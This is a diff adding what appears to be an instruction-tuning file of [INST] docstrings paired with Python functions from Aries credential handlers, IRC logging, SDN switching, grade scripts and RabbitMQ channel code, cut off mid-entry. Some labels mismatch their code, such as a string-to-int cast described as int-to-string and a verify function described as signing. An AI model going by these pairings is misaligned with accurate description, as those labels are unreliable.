diff --git "a/MIXTRAL_DatosEntrenamiento.txt" "b/MIXTRAL_DatosEntrenamiento.txt" new file mode 100644--- /dev/null +++ "b/MIXTRAL_DatosEntrenamiento.txt" @@ -0,0 +1,13675 @@ +[INST] Message handler logic for credential offers.. [/INST] async def handle(self, context: RequestContext, responder: BaseResponder): + r_time = get_timer() + self._logger.debug("CredentialHandler called with context %s", context) + assert isinstance(context.message, CredentialIssue) + self._logger.info( + "Received credential message: %s", context.message.serialize(as_string=True) + ) + if not context.connection_ready: + raise HandlerException("No connection established for credential issue") + credential_manager = CredentialManager(context.profile) + cred_ex_record = await credential_manager.receive_credential( + context.message, context.connection_record.connection_id + ) + r_time = trace_event( + context.settings, + context.message, + outcome="CredentialIssueHandler.handle.END", + perf_counter=r_time, + ) + if context.settings.get("debug.auto_store_credential"): + try: + cred_ex_record = await credential_manager.store_credential( + cred_ex_record + ) + except (CredentialManagerError, IndyHolderError, StorageError) as err: + self._logger.exception(err) + credential_ack_message = await credential_manager.send_credential_ack( + cred_ex_record + ) + trace_event( + context.settings, + credential_ack_message, + outcome="CredentialIssueHandler.handle.STORE", + perf_counter=r_time, + ) +[INST] Message handler logic for Aries#0037 v1.0 presentation requests.. [/INST] async def handle(self, context: RequestContext, responder: BaseResponder): + r_time = get_timer() + self._logger.debug("PresentationRequestHandler called with context %s", context) + assert isinstance(context.message, PresentationRequest) + self._logger.info( + "Received presentation request message: %s", + context.message.serialize(as_string=True), + ) + if not context.connection_ready: + raise HandlerException("No connection established for presentation request") + presentation_manager = PresentationManager(context.profile) + indy_proof_request = context.message.indy_proof_request(0) + try: + async with context.session() as session: + ( + presentation_exchange_record + ) = await V10PresentationExchange.retrieve_by_tag_filter( + session, + {"thread_id": context.message._thread_id}, + {"connection_id": context.connection_record.connection_id}, + ) + except StorageNotFoundError: + presentation_exchange_record = V10PresentationExchange( + connection_id=context.connection_record.connection_id, + thread_id=context.message._thread_id, + initiator=V10PresentationExchange.INITIATOR_EXTERNAL, + role=V10PresentationExchange.ROLE_PROVER, + presentation_request=indy_proof_request, + presentation_request_dict=context.message.serialize(), + auto_present=context.settings.get( + "debug.auto_respond_presentation_request" + ), + trace=(context.message._trace is not None), + ) + presentation_exchange_record.presentation_request = indy_proof_request + presentation_exchange_record = await presentation_manager.receive_request( + presentation_exchange_record + ) + r_time = trace_event( + context.settings, + context.message, + outcome="PresentationRequestHandler.handle.END", + perf_counter=r_time, + ) + if presentation_exchange_record.auto_present: + presentation_preview = None + if presentation_exchange_record.presentation_proposal_dict: + exchange_pres_proposal = PresentationProposal.deserialize( + presentation_exchange_record.presentation_proposal_dict + ) + 
presentation_preview = exchange_pres_proposal.presentation_proposal + try: + req_creds = await indy_proof_req_preview2indy_requested_creds( + indy_proof_request, + presentation_preview, + holder=context.inject(IndyHolder), + ) + except ValueError as err: + self._logger.warning(f"{err}") + return + presentation_message = None + try: + ( + presentation_exchange_record, + presentation_message, + ) = await presentation_manager.create_presentation( + presentation_exchange_record=presentation_exchange_record, + requested_credentials=req_creds, + comment="auto-presented for proof request nonce={}".format( + indy_proof_request["nonce"] + ), + ) + await responder.send_reply(presentation_message) + except ( + IndyHolderError, + LedgerError, + PresentationManagerError, + WalletNotFoundError, + ) as err: + self._logger.exception(err) + if presentation_exchange_record: + await presentation_exchange_record.save_error_state( + context.session(), + reason=err.message, + ) + except StorageError as err: + self._logger.exception(err) + trace_event( + context.settings, + presentation_message, + outcome="PresentationRequestHandler.handle.PRESENT", + perf_counter=r_time, + ) +[INST] Message handler logic for presentations.. [/INST] async def handle(self, context: RequestContext, responder: BaseResponder): + r_time = get_timer() + self._logger.debug("PresentationHandler called with context %s", context) + assert isinstance(context.message, Presentation) + self._logger.info( + "Received presentation message: %s", + context.message.serialize(as_string=True), + ) + presentation_manager = PresentationManager(context.profile) + presentation_exchange_record = await presentation_manager.receive_presentation( + context.message, context.connection_record + ) + r_time = trace_event( + context.settings, + context.message, + outcome="PresentationHandler.handle.END", + perf_counter=r_time, + ) + if context.settings.get("debug.auto_verify_presentation"): + try: + await presentation_manager.verify_presentation( + presentation_exchange_record + ) + except LedgerError as err: + self._logger.exception(err) + if presentation_exchange_record: + await presentation_exchange_record.save_error_state( + context.session(), + reason=err.message, + ) + except StorageError as err: + self._logger.exception(err) + trace_event( + context.settings, + presentation_exchange_record, + outcome="PresentationHandler.handle.VERIFY", + perf_counter=r_time, + ) +[INST] Message handler logic for presentation proposals.. 
[/INST] async def handle(self, context: RequestContext, responder: BaseResponder): + r_time = get_timer() + self._logger.debug("V20PresProposalHandler called with context %s", context) + assert isinstance(context.message, V20PresProposal) + self._logger.info( + "Received v2.0 presentation proposal message: %s", + context.message.serialize(as_string=True), + ) + if not context.connection_ready: + raise HandlerException( + "No connection established for presentation proposal" + ) + pres_manager = V20PresManager(context.profile) + pres_ex_record = await pres_manager.receive_pres_proposal( + context.message, context.connection_record + ) + r_time = trace_event( + context.settings, + context.message, + outcome="V20PresProposalHandler.handle.END", + perf_counter=r_time, + ) + if context.settings.get("debug.auto_respond_presentation_proposal"): + pres_request_message = None + try: + ( + pres_ex_record, + pres_request_message, + ) = await pres_manager.create_bound_request( + pres_ex_record=pres_ex_record, + comment=context.message.comment, + ) + await responder.send_reply(pres_request_message) + except LedgerError as err: + self._logger.exception(err) + if pres_ex_record: + await pres_ex_record.save_error_state( + context.session(), + state=V20PresExRecord.STATE_ABANDONED, + reason=err.message, + ) + except StorageError as err: + self._logger.exception(err) + trace_event( + context.settings, + pres_request_message, + outcome="V20PresProposalHandler.handle.PRESENT", + perf_counter=r_time, + ) +[INST] Request handler for signing a jsonld doc.. [/INST] async def verify(request: web.BaseRequest): + response = {"valid": False} + try: + context: AdminRequestContext = request["context"] + profile = context.profile + body = await request.json() + verkey = body.get("verkey") + doc = body.get("doc") + async with context.session() as session: + if verkey is None: + resolver = session.inject(DIDResolver) + ver_meth_expanded = await resolver.dereference( + profile, doc["proof"]["verificationMethod"] + ) + if ver_meth_expanded is None: + raise MissingVerificationMethodError( + f"Verification method " + f"{doc['proof']['verificationMethod']} not found." + ) + if not isinstance(ver_meth_expanded, VerificationMethod): + raise InvalidVerificationMethod( + "verificationMethod does not identify a valid verification method" + ) + verkey = ver_meth_expanded.material + valid = await verify_credential(session, doc, verkey) + response["valid"] = valid + except ( + BaseJSONLDMessagingError, + ResolverError, + ) as error: + response["error"] = str(error) + except (WalletError, InjectionError): + raise web.HTTPForbidden(reason="No wallet available") + return web.json_response(response) +[INST] Message handler logic for v2.0 presentation requests.. 
[/INST] async def handle(self, context: RequestContext, responder: BaseResponder): + r_time = get_timer() + self._logger.debug("V20PresRequestHandler called with context %s", context) + assert isinstance(context.message, V20PresRequest) + self._logger.info( + "Received v2.0 presentation request message: %s", + context.message.serialize(as_string=True), + ) + if not context.connection_ready: + raise HandlerException("No connection established for presentation request") + pres_manager = V20PresManager(context.profile) + try: + async with context.session() as session: + pres_ex_record = await V20PresExRecord.retrieve_by_tag_filter( + session, + {"thread_id": context.message._thread_id}, + {"connection_id": context.connection_record.connection_id}, + ) + pres_ex_record.pres_request = context.message.serialize() + except StorageNotFoundError: + pres_ex_record = V20PresExRecord( + connection_id=context.connection_record.connection_id, + thread_id=context.message._thread_id, + initiator=V20PresExRecord.INITIATOR_EXTERNAL, + role=V20PresExRecord.ROLE_PROVER, + pres_request=context.message.serialize(), + auto_present=context.settings.get( + "debug.auto_respond_presentation_request" + ), + trace=(context.message._trace is not None), + ) + pres_ex_record = await pres_manager.receive_pres_request( + pres_ex_record + ) + r_time = trace_event( + context.settings, + context.message, + outcome="V20PresRequestHandler.handle.END", + perf_counter=r_time, + ) + if pres_ex_record.auto_present: + indy_proof_request = context.message.attachment(V20PresFormat.Format.INDY) + try: + req_creds = await indy_proof_req_preview2indy_requested_creds( + indy_proof_request, + preview=None, + holder=context.inject(IndyHolder), + ) + except ValueError as err: + self._logger.warning(f"{err}") + return + pres_message = None + try: + (pres_ex_record, pres_message) = await pres_manager.create_pres( + pres_ex_record=pres_ex_record, + requested_credentials=req_creds, + comment=( + "auto-presented for proof request nonce " + f"{indy_proof_request['nonce']}" + ), + ) + await responder.send_reply(pres_message) + except ( + IndyHolderError, + LedgerError, + V20PresManagerError, + WalletNotFoundError, + ) as err: + self._logger.exception(err) + if pres_ex_record: + await pres_ex_record.save_error_state( + context.session(), + state=V20PresExRecord.STATE_ABANDONED, + reason=err.message, + ) + except StorageError as err: + self._logger.exception(err) + trace_event( + context.settings, + pres_message, + outcome="V20PresRequestHandler.handle.PRESENT", + perf_counter=r_time, + ) +[INST] Message handler logic for presentation proposals.. 
[/INST] async def handle(self, context: RequestContext, responder: BaseResponder): + r_time = get_timer() + self._logger.debug( + "PresentationProposalHandler called with context %s", context + ) + assert isinstance(context.message, PresentationProposal) + self._logger.info( + "Received presentation proposal message: %s", + context.message.serialize(as_string=True), + ) + if not context.connection_ready: + raise HandlerException( + "No connection established for presentation proposal" + ) + presentation_manager = PresentationManager(context.profile) + presentation_exchange_record = await presentation_manager.receive_proposal( + context.message, context.connection_record + ) + r_time = trace_event( + context.settings, + context.message, + outcome="PresentationProposalHandler.handle.END", + perf_counter=r_time, + ) + if context.settings.get("debug.auto_respond_presentation_proposal"): + presentation_request_message = None + try: + ( + presentation_exchange_record, + presentation_request_message, + ) = await presentation_manager.create_bound_request( + presentation_exchange_record=presentation_exchange_record, + comment=context.message.comment, + ) + await responder.send_reply(presentation_request_message) + except LedgerError as err: + self._logger.exception(err) + if presentation_exchange_record: + await presentation_exchange_record.save_error_state( + context.session(), + reason=err.message, + ) + except StorageError as err: + self._logger.exception(err) + trace_event( + context.settings, + presentation_request_message, + outcome="PresentationProposalHandler.handle.PRESENT", + perf_counter=r_time, + ) +[INST] Message handler logic for credential requests.. [/INST] async def handle(self, context: RequestContext, responder: BaseResponder): + r_time = get_timer() + self._logger.debug("V20CredRequestHandler called with context %s", context) + assert isinstance(context.message, V20CredRequest) + self._logger.info( + "Received v2.0 credential request message: %s", + context.message.serialize(as_string=True), + ) + if not context.connection_ready: + raise HandlerException("No connection established for credential request") + cred_manager = V20CredManager(context.profile) + cred_ex_record = await cred_manager.receive_request( + context.message, context.connection_record.connection_id + ) + r_time = trace_event( + context.settings, + context.message, + outcome="V20CredRequestHandler.handle.END", + perf_counter=r_time, + ) + if cred_ex_record.auto_issue: + cred_issue_message = None + try: + ( + cred_ex_record, + cred_issue_message, + ) = await cred_manager.issue_credential( + cred_ex_record=cred_ex_record, + comment=context.message.comment, + ) + await responder.send_reply(cred_issue_message) + except (V20CredManagerError, IndyIssuerError, LedgerError) as err: + self._logger.exception(err) + except StorageError as err: + self._logger.exception(err) + trace_event( + context.settings, + cred_issue_message, + outcome="V20CredRequestHandler.issue.END", + perf_counter=r_time, + ) +[INST] Message handler logic for credential proposals.. 
[/INST] async def handle(self, context: RequestContext, responder: BaseResponder): + r_time = get_timer() + self._logger.debug("V20CredProposalHandler called with context %s", context) + assert isinstance(context.message, V20CredProposal) + self._logger.info( + "Received v2.0 credential proposal message: %s", + context.message.serialize(as_string=True), + ) + if not context.connection_ready: + raise HandlerException("No connection established for credential proposal") + cred_manager = V20CredManager(context.profile) + cred_ex_record = await cred_manager.receive_proposal( + context.message, context.connection_record.connection_id + ) + r_time = trace_event( + context.settings, + context.message, + outcome="CredentialProposalHandler.handle.END", + perf_counter=r_time, + ) + if cred_ex_record.auto_offer: + cred_offer_message = None + try: + (cred_ex_record, cred_offer_message) = await cred_manager.create_offer( + cred_ex_record, + counter_proposal=None, + comment=context.message.comment, + ) + await responder.send_reply(cred_offer_message) + except (V20CredManagerError, IndyIssuerError, LedgerError) as err: + self._logger.exception(err) + if cred_ex_record: + await cred_ex_record.save_error_state( + context.session(), + reason=err.message, + ) + except StorageError as err: + self._logger.exception(err) + trace_event( + context.settings, + cred_offer_message, + outcome="V20CredProposalHandler.handle.OFFER", + perf_counter=r_time, + ) +[INST] Message handler logic for credential offers.. [/INST] async def handle(self, context: RequestContext, responder: BaseResponder): + r_time = get_timer() + self._logger.debug("V20CredIssueHandler called with context %s", context) + assert isinstance(context.message, V20CredIssue) + self._logger.info( + "Received v2.0 credential issue message: %s", + context.message.serialize(as_string=True), + ) + if not context.connection_ready: + raise HandlerException("No connection established for credential issue") + cred_manager = V20CredManager(context.profile) + cred_ex_record = await cred_manager.receive_credential( + context.message, context.connection_record.connection_id + ) + r_time = trace_event( + context.settings, + context.message, + outcome="V20CredIssueHandler.handle.END", + perf_counter=r_time, + ) + if context.settings.get("debug.auto_store_credential"): + try: + cred_ex_record = await cred_manager.store_credential(cred_ex_record) + except (V20CredManagerError, IndyHolderError, StorageError) as err: + self._logger.exception(err) + cred_ack_message = await cred_manager.send_cred_ack(cred_ex_record) + trace_event( + context.settings, + cred_ack_message, + outcome="V20CredIssueHandler.handle.STORE", + perf_counter=r_time, + ) +[INST] Try to cast an int to a string. If you can't, return the fallback value. [/INST] def to_int(s, fallback=0): + try: + result = int(s) + except ValueError: + result = fallback + except TypeError: + result = fallback + return result +[INST] Creates migrations for the following account use cases: +move an account +- when the remote parent ou exists - ACCOUNT_MOVE +- when the remote parent ou does not exist - ACCOUNT_MOVE_WITH_NON_EXISTENT_PARENT_OU. 
[/INST] def make_migrations_for_accounts(organizations, root_id: str) -> None: + accounts = get_accounts_folders() + for account_file_path in accounts: + account_name = account_file_path.split(SEP)[-1] + account_details = yaml.safe_load( + open(f"{account_file_path}{SEP}{META_FILE_NAME}", "r").read() + ) + list_parents_single_page_response = organizations.list_parents_single_page( + ChildId=account_details.get("Id") + ).get("Parents") + if len(list_parents_single_page_response) != 1: + raise Exception( + f"{account_details.get('Id')} has {len(list_parents_single_page_response)} parents." + ) + remote_parent_organizational_unit_ou_id = list_parents_single_page_response[ + 0 + ].get("Id") + parent_ou_path_details_file_path = SEP.join( + account_file_path.split(SEP)[0:-2] + [META_FILE_NAME] + ) + if os.path.exists(parent_ou_path_details_file_path): + local_parent_ou_details = yaml.safe_load( + open(parent_ou_path_details_file_path, "r").read() + ) + local_parent_organizational_unit_ou_id = local_parent_ou_details.get("Id") + if ( + local_parent_organizational_unit_ou_id + != remote_parent_organizational_unit_ou_id + ): + write_migration( + EXTENSION, + root_id, + migrations.ACCOUNT_MOVE, + dict( + account_id=account_details.get("Id"), + source_parent_id=remote_parent_organizational_unit_ou_id, + destination_parent_id=local_parent_organizational_unit_ou_id, + ), + ) + else: + destination_path = SEP.join( + [""] + parent_ou_path_details_file_path.split(SEP)[3:-1] + ).replace(f"{SEP}_organizational_units", "") + write_migration( + EXTENSION, + root_id, + migrations.ACCOUNT_MOVE_WITH_NON_EXISTENT_PARENT_OU, + dict( + account_id=account_details.get("Id"), + source_parent_id=remote_parent_organizational_unit_ou_id, + destination_path=destination_path, + ), + ) +[INST] Take an iterable list of log events and yield human-readable text strings. [/INST] def render_buffer(self, lines): + for line in lines: + try: + yield self.render_line(line.body) + except KeyError: + self.log.exception("Rendering exception") +[INST] Render a single log event to a string.. 
[/INST] def render_line(self, line): + time = eid_to_datetime(line['eid'], self.tz) + msg = "[%s] " % (time.strftime('%Y-%m-%d %H:%M:%S')) + if line['type'] == 'buffer_msg': + msg += "<%s> %s" % (line.get('from', line.get('server')), line['msg']) + return msg + if line['type'] == 'buffer_me_msg': + msg += "— %s %s" % (line['from'], line['msg']) + return msg + if line['type'] in ['joined_channel', 'you_joined_channel']: + msg += '→ ' + elif line['type'] in ['parted_channel', 'you_parted_channel']: + msg += '← ' + elif line['type'] == 'quit': + msg += '⇐ ' + else: + msg += '* ' + if line['type'] in VERBATIM: + try: + msg += line['msg'] + except KeyError: + self.log.warn("Log type %s has no attribute 'msg'", line['type']) + elif line['type'] in MESSAGES: + temp = Template(MESSAGES[line['type']]) + msg += temp.safe_substitute(defaultdict(lambda: '', line)) + elif line['type'] in STATS: + if 'parts' in line: + msg += line['parts'] + ": " + msg += line['msg'] + elif line['type'] == 'user_channel_mode': + msg += '%s set %s %s' % (line.get('from', line.get('server')), line['diff'], line['nick']) + elif line['type'] == 'channel_query': + if line['query_type'] == 'timestamp': + msg += 'channel timestamp is %s' % line['timestamp'] + elif line['query_type'] == 'mode': + msg += 'channel mode is %s' % line['newmode'] + else: + self.log.warn('Unknown channel_query type: %s', line['query_type']) + elif line['type'] == 'channel_mode': + msg += 'Channel mode set to %s by ' % line['diff'] + if 'from' in line: + msg += line['from'] + else: + msg += 'the server %s' % line['server'] + elif line['type'] == 'motd_response': + msg += "\n".join(line['lines']) + elif line['type'] in ['cap_ls', 'cap_req', 'cap_ack']: + if line['type'] == 'cap_ls': + msg += 'Available' + if line['type'] == 'cap_req': + msg += 'Requested' + if line['type'] == 'cap_ack': + msg += 'Acknowledged' + msg += ' capabilities: %s' % ' | '.join(line['caps']) + elif line['type'] == 'unknown_umode': + if 'flag' in line: + msg += line['flag'] + " " + msg += line['msg'] + elif line['type'] == 'time': + msg += 'Server time: %s' % line['time_string'] + if 'time_stamp' in line: + msg += ' (%s)' % line['time_stamp'] + msg += ' - %s' % line['time_server'] + else: + if 'msg' in line: + msg += line['msg'] + self.log.warn('Unknown message type (%s)', line['type']) + return msg +[INST] In packet_in handler, we need to learn access_table by ARP. +Therefore, the first packet from UNKOWN host MUST be ARP.. [/INST] def _packet_in_handler(self, ev): + msg = ev.msg + datapath = msg.datapath + in_port = msg.match['in_port'] + pkt = packet.Packet(msg.data) + arp_pkt = pkt.get_protocol(arp.arp) + ip_pkt = pkt.get_protocol(ipv4.ipv4) + if isinstance(arp_pkt, arp.arp): + self.logger.debug("ARP processing") + self.arp_forwarding(msg, arp_pkt.src_ip, arp_pkt.dst_ip) + arp_src_ip = arp_pkt.src_ip + arp_dst_ip = arp_pkt.dst_ip + mac = arp_pkt.src_mac + self.awareness.register_access_info(datapath.id, in_port, arp_src_ip, mac) + if isinstance(ip_pkt, ipv4.ipv4): + self.logger.debug("IPV4 processing") + if len(pkt.get_protocols(ethernet.ethernet)): + eth_type = pkt.get_protocols(ethernet.ethernet)[0].ethertype + self.shortest_forwarding(msg, eth_type, ip_pkt.src, ip_pkt.dst) +[INST] Prints the all collected info for each of the links in the +graph/topology. 
[/INST] def show_all_collected_info(self): + self.logger.info("\nsrc dst bandwidth packet_rate error") + self.logger.info("------------------------------------------------------------------------------") + for src in self.graph: + for dst in self.graph[src]: + bandwidth = -1 + error = -1 + packet_rate = -1 + if 'bandwidth' in self.graph[src][dst]: + bandwidth = self.graph[src][dst]['bandwidth'] + if 'packet_rate' in self.graph[src][dst]: + packet_rate = self.graph[src][dst]['packet_rate'] + if 'error' in self.graph[src][dst]: + error = self.graph[src][dst]['error'] + if packet_rate == -1 and error == -1 and bandwidth == -1: + continue + else: + self.awareness.is_ready = True + self.logger.info("%s<-->%s : %d %d %d" % (src, dst, bandwidth, packet_rate, error)) +[INST] Prints the bandwidth for each of the links in the +graph/topology. [/INST] def show_bandwidth(self): + self.logger.info("\nsrc dst bandwidth") + self.logger.info("---------------------------") + for src in self.graph: + for dst in self.graph[src]: + if 'bandwidth' in self.graph[src][dst]: + bandwidth = self.graph[src][dst]['bandwidth'] + self.logger.info("%s<-->%s : %s" % (src, dst, bandwidth)) + else: + continue +[INST] Prints the packet rate for each of the links in the +graph/topology. [/INST] def show_packet_rate(self): + self.logger.info("\nsrc dst packet_rate") + self.logger.info("---------------------------") + for src in self.graph: + for dst in self.graph[src]: + if 'packet_rate' in self.graph[src][dst]: + packet_rate = self.graph[src][dst]['packet_rate'] + self.logger.info("%s<-->%s : %s" % (src, dst, packet_rate)) + else: + continue +[INST] Prints the errors for each of the links in the +graph/topology. [/INST] def show_errors(self): + self.logger.info("\nsrc dst errors") + self.logger.info("---------------------------") + for src in self.graph: + for dst in self.graph[src]: + if 'error' in self.graph[src][dst]: + error = self.graph[src][dst]['error'] + self.logger.info("%s<-->%s : %s" % (src, dst, error)) + else: + continue +[INST] Use an if/elif chain to find the student's letter grade. [/INST] def calcLetterGrade(self): + if self.percent < 60: + letter = 'F' + elif self.percent < 70: + letter = 'D' + elif self.percent < 80: + letter = 'C' + elif self.percent < 90: + letter = 'B' + else: + letter = 'A' + self.letterGrade = letter +[INST] Check which option the user chose with an if statement. [/INST] def checkGrades(): + fileContents = getFileAsString('exam_grades.csv') + enter_choice = getChoice() + if enter_choice == 1: + print('The lowest grade is', min(fileContents)) + elif enter_choice == 2: + print('The highest grade is', max(fileContents)) + elif enter_choice == 3: + avg_sum = 0 + for score in fileContents: + avg_sum += int(score) + avg = avg_sum / len(fileContents) + print('The average grade is', avg) + elif enter_choice == 4: + user = int(input('Enter a number to search for: ')) + if user in fileContents: + print('The grade', user, 'was present') + else: + print('The grade', user, 'was not present') +[INST] Function that builds and returns a dictionary by reading through a file. 
[/INST] def createStudentDictionary(): + studentDict = {} + f = open('class_roster.txt') + line = f.readline() + while line: + first_name, last_name, student_id, year = line.split(',') + student_year = year.strip(' \n ') + student_tup = (first_name, last_name, student_year) + studentDict.update({student_id: student_tup}) + line = f.readline() + f.close() + return studentDict +[INST] Function that formats an entry from the dictionary above. [/INST] def studentSearch(dictionary, studentID): + try: + combining = dictionary[studentID] + total = "First Name: {} \nLast Name: {} \nSchool Year: {} ".format(combining[0], combining[1], combining[2]) + return total + except KeyError: + errorsum = 'No student found with ID ' + studentID + '.\n' + return errorsum +[INST] Convert an object to a type that is fairly generally serializable. +This only handles the cases that need converting. The json module handles all the rest.. [/INST] def convert_serializable_special_cases(o): + if isinstance(o, Enum): + serializable_representation = o.name + elif isinstance(o, Decimal): + try: + is_int = o % 1 == 0 + except decimal.InvalidOperation: + is_int = False + if is_int: + serializable_representation = int(o) + else: + serializable_representation = float(o) + elif isinstance(o, bytes) or isinstance(o, bytearray): + serializable_representation = str(o) + elif hasattr(o, "value"): + serializable_representation = str(o.value) + else: + serializable_representation = str(o) + return serializable_representation +[INST] Structured formatter helper function. When called with any number of positional or keyword arguments, creates a structured string representing those arguments. +This is a short function name (sf) since it usually goes inside a logging call. + +Example code: +question = "life" +answer = 42 +log.info(sf("test structured logging", question=question, answer=answer)). [/INST] def sf(*args, **kwargs): + separator = "," + output_list = [] + if len(args) > 0: + output_list.append(separator.join(args)) + if len(kwargs) > 0: + output_list.extend([structured_sentinel, json.dumps(kwargs, default=convert_serializable_special_cases), structured_sentinel]) + return " ".join(output_list) +[INST] Construct a tree with +depth nvar, +total order pt, +interaction jt: number of nonzero terms. [/INST] def tree_building(tree, nvar, pt, jt): + if nvar == 1 and (jt != 0 or pt == 0): + nn = Node(pt) + tree.add_child(nn) + else: + for ii in range(pt+1): + next_pt = pt - ii + if ii == 0: + next_jt = jt + else: + next_jt = jt - 1 + if next_jt <= nvar - 1 \ + and next_jt <= next_pt \ + and (next_jt > 0 or (next_jt == 0 and next_pt == 0)): + nn = Node(ii) + tree.add_child(nn) + tree_building(nn, nvar-1, next_pt, next_jt) + else: + pass +[INST] Return the total combination with +nvar: number of variables +order: total order +qnorm: qnorm constraint. [/INST] def total_combination(nvar, order, jtmax=np.inf, qnorm=1): + order_list = [] + for sum_order in range(order + 1): + for jt in range(min(sum_order+1, jtmax+1)): + order_list += single_combination(nvar, sum_order, jt, order, qnorm) + return order_list +[INST] Build large X, Y for linear regression. [/INST] def build_xy(order_list, poly, x, y, xdev=[], dydx=[]): + X = expand_x(order_list, x, poly) + Y = np.array(y).flatten() + if len(xdev) != 0: + Xdev = expand_dev_xy(order_list, xdev, poly) + Dydx = np.array(dydx).flatten() + X = np.vstack((X, Xdev)) + Y = np.append(Y, Dydx) + return X, Y +[INST] Turns a human-given string into time in minutes +e.g.. 
[/INST] def time_to_min(in_time: str) -> int: + times = [int(x.strip()) for x in in_time.strip("m").split("h")] + assert len(times) <= 2 + if len(times) == 1: + return times[0] + else: + return times[0] * 60 + times[1] +[INST] Main scoring function that calculates the winnings. [/INST] def score(times: list, pot: int, power: float = 0.1) -> list: + power_times = [x ** power for x in times] + max_time, min_time = max(power_times), min(power_times) + scores = [max_time - x for x in power_times] + return [round(float(x) / sum(scores) * pot, 2) for x in scores] +[INST] Execute the RPC command for the frame.. [/INST] def _rpc(self, frame_value): + LOGGER.debug('Issuing RPC to RabbitMQ: %r', frame_value) + if self.channel.closed: + raise exceptions.ChannelClosedException() + return self.channel.rpc(frame_value) +[INST] Write a frame to the channel's connection. [/INST] def _write_frame(self, frame_value): + self.channel.write_frame(frame_value) +[INST] Set the state to the specified value, validating it is a supported +state value.. [/INST] def _set_state(self, value): + if value not in list(self.STATES.keys()): + raise ValueError('Invalid state value: %r' % value) + LOGGER.debug('%s setting state to %r', + self.__class__.__name__, self.STATES[value]) + self._state = value +[INST] Returns True if in the CLOSED runtime state. [/INST] def closed(self): + return self._state == self.CLOSED +[INST] Returns True if in the CLOSING runtime state. [/INST] def closing(self): + return self._state == self.CLOSING +[INST] Returns True if in the OPEN runtime state. [/INST] def open(self): + return self._state == self.OPEN +[INST] Returns True if in the OPENING runtime state. [/INST] def opening(self): + return self._state == self.OPENING +[INST] Returns the text-based description of the runtime state. [/INST] def state_description(self): + return self.STATES[self._state] +[INST] Send an RPC command to the remote server. This should not be directly +invoked.. [/INST] def rpc(self, frame_value): + if self.closed: + raise exceptions.ChannelClosedException() + if self._is_debugging: + LOGGER.debug('Sending %r', frame_value.name) + self.write_frame(frame_value) + if frame_value.synchronous: + return self._wait_on_frame(frame_value.valid_responses) +[INST] Used by the Message.publish method when publisher confirmations are +enabled.. [/INST] def wait_for_confirmation(self): + return self._wait_on_frame([specification.Basic.Ack, + specification.Basic.Nack]) +[INST] Put the frame in the write queue for the IOWriter object to write to +the socket when it can. This should not be directly invoked.. [/INST] def write_frame(self, frame): + if self.closed: + return + self._check_for_exceptions() + if self._is_debugging: + LOGGER.debug('Writing frame: %s', frame.name) + with self._write_lock: + self._write_queue.put((self._channel_id, frame)) + self._trigger_write() +[INST] Add a list of frames for the IOWriter object to write to the socket +when it can.. [/INST] def write_frames(self, frames): + if self.closed: + return + self._check_for_exceptions() + if self._is_debugging: + LOGGER.debug('Writing frames: %r', [frame.name for frame in frames]) + with self._write_lock: + [self._write_queue.put((self._channel_id, frame)) + for frame in frames] + self._trigger_write() +[INST] Return the proper close frame for this object.. 
[/INST] def _build_close_frame(self): + return self.CLOSE_REQUEST_FRAME(self.DEFAULT_CLOSE_CODE, + self.DEFAULT_CLOSE_REASON) +[INST] Check if there are any queued exceptions to raise, raising it if +there is.. [/INST] def _check_for_exceptions(self): + if not self._exceptions.empty(): + exception = self._exceptions.get() + self._exceptions.task_done() + raise exception +[INST] Implement in child objects to inspect frames for channel specific +RPC requests from RabbitMQ.. [/INST] def _check_for_rpc_request(self, value): + if isinstance(value, specification.Channel.Close): + LOGGER.debug('Channel closed') + self._on_remote_close(value) +[INST] Invoke to interrupt the current self._wait_on_frame blocking loop +in order to allow for a flow such as waiting on a full message while +consuming. Will wait until the ``_wait_on_frame_interrupt`` is cleared +to make this a blocking operation.. [/INST] def _interrupt_wait_on_frame(self, callback, *args): + if not self._waiting: + if self._is_debugging: + LOGGER.debug('No need to interrupt wait') + return callback(*args) + LOGGER.debug('Interrupting the wait on frame') + self._interrupt['callback'] = callback + self._interrupt['args'] = args + self._interrupt['event'].set() +[INST] Handle RabbitMQ remotely closing the channel. [/INST] def _on_remote_close(self, value): + self._set_state(self.REMOTE_CLOSED) + if value.reply_code in exceptions.AMQP: + LOGGER.error('Received remote close (%s): %s', + value.reply_code, value.reply_text) + raise exceptions.AMQP[value.reply_code](value) + else: + raise exceptions.RemoteClosedChannelException(self._channel_id, + value.reply_code, + value.reply_text) +[INST] Check to see if a frame is in the queue and if so, return it. [/INST] def _read_from_queue(self): + if not self.closing and self.blocking_read: + LOGGER.debug('Performing a blocking read') + value = self._read_queue.get() + self._read_queue.task_done() + else: + try: + value = self._read_queue.get(True, .1) + self._read_queue.task_done() + except queue.Empty: + value = None + return value +[INST] Notifies the IO loop we need to write a frame by writing a byte +to a local socket.. [/INST] def _trigger_write(self): + try: + self._write_trigger.send(b'0') + except socket.error: + pass +[INST] Validate the frame value against the frame type. The frame type can +be an individual frame type or a list of frame types.. [/INST] def _validate_frame_type(self, frame_value, frame_type): + if frame_value is None: + if self._is_debugging: + LOGGER.debug('Frame value is none?') + return False + if isinstance(frame_type, str): + if frame_value.name == frame_type: + return True + elif isinstance(frame_type, list): + for frame_t in frame_type: + result = self._validate_frame_type(frame_value, frame_t) + if result: + return True + return False + elif isinstance(frame_value, specification.Frame): + return frame_value.name == frame_type.name + return False +[INST] Read from the queue, blocking until a result is returned. An +individual frame type or a list of frame types can be passed in to wait +for specific frame types. If there is no match on the frame retrieved +from the queue, put the frame back in the queue and recursively +call the method.. 
[/INST] def _wait_on_frame(self, frame_type=None): + if isinstance(frame_type, list) and len(frame_type) == 1: + frame_type = frame_type[0] + if self._is_debugging: + LOGGER.debug('Waiting on %r frame(s)', frame_type) + start_state = self.state + self._waiting = True + while not self.closed and start_state == self.state: + value = self._read_from_queue() + if value is not None: + self._check_for_rpc_request(value) + if frame_type and self._validate_frame_type(value, frame_type): + self._waiting = False + return value + self._read_queue.put(value) + try: + self._check_for_exceptions() + except: + self._waiting = False + raise + if self._interrupt_is_set: + if self._is_debugging: + LOGGER.debug('Exiting wait due to interrupt') + break + self._waiting = False + if self._interrupt_is_set: + self._on_interrupt_set() +[INST] Create and start the timer that will check every N*2 seconds to +ensure that a heartbeat has been requested.. [/INST] def _start_timer(self): + if not self._interval: + return + LOGGER.debug('Started a heartbeat timer that will fire in %i sec', + self._interval) + self._timer = threading.Timer(self._interval, self._check) + self._timer.daemon = True + self._timer.start() +[INST] Return the number of bytes read/received from RabbitMQ. [/INST] def bytes_received(self): + return self._bytes_read +[INST] Common functions when 